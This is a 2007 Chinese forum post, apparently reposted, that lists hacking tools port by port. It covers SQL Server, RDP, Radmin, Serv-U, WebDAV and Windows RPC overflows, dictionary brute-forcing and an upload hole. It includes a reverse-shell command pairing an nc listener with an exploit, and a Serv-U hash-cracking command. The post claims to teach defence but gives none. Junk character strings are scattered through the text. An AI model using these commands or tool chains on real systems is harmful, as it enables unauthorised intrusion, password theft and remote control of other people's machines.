 该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 ) M; A$ w1 Z- O7 F
3 S3 @: E+ ^: D+ {
* X8 w. l% J. m& b7 I 1. 1433端口入侵 ! g- k) v- Z2 ^9 r
8 i) ~* S8 s0 E3 {6 s& f% s
scanport.exe 查有1433的机器
- C( v0 O3 x* Z2 F0 y' Y# Z: Z5 B
SQLScanPass.exe 进行字典暴破(字典是关键) 0 T* n/ H7 L6 d3 F0 h" j
9 |' h0 ^2 h/ \9 I8 S 最后 SQLTools.exe入侵
) x, }, @/ C5 P; D* t, u
7 e3 [) G: m; d0 F ============================= V3 L9 R& U( U- ^& I( g4 A
0 h$ a# Y5 `% W* m
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
7 {" L5 C5 m A8 f4 B! Z6 s$ i' y1 I0 E
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 ( s4 z7 p6 v* a# e6 d* N0 K
- @( k" ?% n, j, e" {0 |: W8 L) e
(以上反向的,测试成功)
' S. x" ^, J `2 L& ^$ v p7 f/ ?+ |
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
) F( H {) _# a& r" w
! v& h2 U+ t G2 M7 h 2. 4899端口入侵 r) Z9 P" M' r1 w" l
* I, b5 I) T. B+ W 用4899过滤器.exe,扫描空口令的机器
; Q% G9 X& \) L, b5 J3 ~. c8 c
; o7 {, t7 h# t: N; L3 h* _ 3. 3899的入侵
. Y/ l) b H! V, E$ N# d: C8 z) w+ K1 J- l
对很早的机器,可以试试3389的溢出(win3389ex.exe) 2 Y0 \9 w. P4 X4 p: v
' g: g+ V. @9 e
对2000的机器,可以试试字典暴破。(tscrack.exe)
* w1 c6 D, e; b7 A- z1 P $ P+ b1 g4 s; n" ?8 h7 ^. G! O, R
4. 80入侵
- }' w; @1 C( j: E- `9 P5 x& L/ u+ Z/ }
对sp3以前的机器,可以用webdav入侵;
6 E( f [; k9 j1 P$ e. e: s: r S; `, `$ u4 Q3 y
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 6 r ^' t- x S3 m
* {) m! k1 c+ K+ s 可以利用SQL进行注入。(小榕的注入软件)。
+ N! T; N% ?: [1 H# `( r+ O: N5 u0 T; _6 D
5. serv-u入侵(21端口)
: p/ U4 H& D6 x+ J3 n1 i! V g' ]3 A: s! Z* O. M
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) & f/ U' a' M5 z+ e
1 v' ?% f6 O' ~( f; g4 u
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 5 d k9 Y& P7 R8 z5 F4 G
- d* L" K& M7 }0 x j1 r
====================================== 7 D K8 I# o% s0 Z
9 ]7 `: m( n# L' G8 Q! ^6 n) E; W
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 3 ?6 Q: d6 l w3 j, c$ y
i7 }( i( D7 ~. q 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A " t! r' ?' S- e4 ~; c# \1 q0 O
! r( l4 x! Q+ t K
6. 554端口 / c' N; g( v7 g# i
, [$ f5 F1 ]! ]4 M3 T2 G! w
用real554.exe入侵。
$ w6 z1 {6 I2 Z7 r+ K; ^2 N( [ 5 u i3 L, O9 _1 ~2 |1 V/ Z
7. 6129端口 6 f; r% v- y- G, Y8 A
+ z* X+ u, q$ E8 q8 o# k/ s
用DameWare6129.exe入侵。 : n4 S' O( p" \, i+ A$ A
0 ^' A4 K, P7 ?8 x 8. 系统漏洞 9 [' D" z, i" [( J1 o$ o! M! l
/ E5 J2 x# h+ h. e" { 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
+ x5 @& l' l6 M" h( e' f3 V( q/ D2 I" L+ P/ L
进行溢出入侵。
~2 t$ {- z# L4 c( i
! D& d4 c0 T9 ]0 `) z3 } 9. 3127等端口
+ L6 ~( o8 w- `3 b* ~, j1 g. P2 J, G$ H# L- R. b3 Y
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 : F% |! \' b5 k5 L- _
, H# j1 L2 O4 P5 K 10. 其他入侵 3 }, N0 t. R9 S0 F# v: h
, W% ^# E) U1 g: q! x
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
& F$ x9 c j) I' l+ \! `6 u5 o* @$ _" O9 d# {
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
